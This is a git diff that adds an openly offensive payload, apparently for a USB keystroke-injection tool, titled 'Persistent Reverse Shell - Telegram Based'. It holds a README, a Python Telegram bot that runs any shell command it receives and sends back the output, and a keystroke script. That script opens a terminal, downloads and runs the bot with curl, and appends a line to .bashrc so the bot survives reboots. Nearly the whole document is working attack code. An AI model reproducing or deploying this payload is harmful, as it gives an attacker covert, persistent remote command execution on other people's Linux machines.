diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md new file mode 100644 index 000000000..8bd1028de --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -0,0 +1,41 @@ +# Persistent Reverse Shell - Telegram Based + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +**Category**: Execution + +## Dependencies + +* Internet Connection + +## Description + +A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot. + +This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection. + +The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`. + +Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py new file mode 100644 index 000000000..bcb367760 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py @@ -0,0 +1,43 @@ +from telebot import TeleBot, types +import subprocess + +# Set here the Telegram bot token +BOT_TOKEN = "" +bot = TeleBot(BOT_TOKEN) + +commands = [ + types.BotCommand("/reverse", "/reverse ") +] + +bot.set_my_commands(commands=commands) + +@bot.message_handler(commands=['reverse']) +def reverse_shell(message): + command = extract_command(message.text) + if command != "": + print(f"Command received: {command}") + out = run_command(command) + if len(out) > 1000: + bot.reply_to(message, "Message too long...") + chunk_size = 1000 + for i in range(0, len(out), chunk_size): + bot.send_message(message.chat.id, out[i:i+chunk_size]) + else: + bot.reply_to(message, out) + +def extract_command(message): + command_prefix = "/reverse" + if message.startswith(command_prefix): + return message[len(command_prefix):].strip() + else: + return None + +def run_command(command): + try: + result = subprocess.check_output(command, shell=True, text=True) + return result.strip() + except subprocess.CalledProcessError as e: + return f"Some error: {e}" + + +bot.infinity_polling() diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt new file mode 100644 index 000000000..3ffd8fcc7 --- /dev/null +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt @@ -0,0 +1,32 @@ +* REM ############################################################ +* REM # # +* REM # Title : Persistent Reverse Shell - Telegram Based # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Execution # +* REM # Target : Linux # +* REM # # +* REM ############################################################ + +ATTACKMODE HID + +* REM Requirements: +* REM - Internet Connection + +QUACK REM VARIABLES +* REM 1) Here you must put your own file link. +PYTHON-SCRIPT-LINK='https://www.example.com/connection.py' + +QUACK DELAY 1000 +QUACK CTRL-ALT t +QUACK DELAY 2000 + +QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then +QUACK ENTER + +QUACK STRING python3 connection.py & +QUACK ENTER + +QUACK STRING fi\" >> .bashrc; exit +QUACK ENTER +